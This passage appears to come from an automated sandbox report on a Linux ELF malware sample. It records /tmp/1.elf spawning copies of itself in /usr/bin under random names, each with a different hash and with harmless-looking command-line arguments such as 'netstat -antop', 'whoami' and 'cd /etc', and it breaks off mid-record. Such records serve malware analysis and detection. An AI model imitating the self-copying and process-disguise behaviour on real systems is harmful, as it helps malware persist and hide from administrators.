                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:/usr/bin/ssrfvzfvpk "ifconfig eth0" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:/usr/bin/ssrfvzfvpk top 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:/usr/bin/ssrfvzfvpk ifconfig 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:/usr/bin/ssrfvzfvpk "route -n" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:01
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ssrfvzfvpk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:c7f6b1948208a5e292a0ce152567dd8f

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:/usr/bin/bhmsjmfdgk "sleep 1" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:/usr/bin/bhmsjmfdgk whoami 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:/usr/bin/bhmsjmfdgk "sleep 1" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:06
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:/usr/bin/bhmsjmfdgk gnome-terminal 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:07
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:07
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:07
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:07
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:/usr/bin/bhmsjmfdgk pwd 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:07
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bhmsjmfdgk
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:78478a175b52118257c1908b16bd07f5

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:/usr/bin/ctjziyscga "ls -la" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:/usr/bin/ctjziyscga pwd 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:/usr/bin/ctjziyscga "netstat -antop" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:/usr/bin/ctjziyscga id 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:/usr/bin/ctjziyscga "ifconfig eth0" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:12
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ctjziyscga
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:be0d21af660064bc9a4c5c1292894f1d

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:/usr/bin/ggufoivoip "echo \"find\"" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:/usr/bin/ggufoivoip pwd 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:/usr/bin/ggufoivoip "netstat -antop" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:/usr/bin/ggufoivoip "echo \"find\"" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:17
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:/usr/bin/ggufoivoip "netstat -an" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:18
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ggufoivoip
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9b2c11b824ddfcc1d5f7ae5bc4b60f09

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:/usr/bin/gvjfjjanun "echo \"find\"" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:/usr/bin/gvjfjjanun "cd /etc" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:/usr/bin/gvjfjjanun id 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
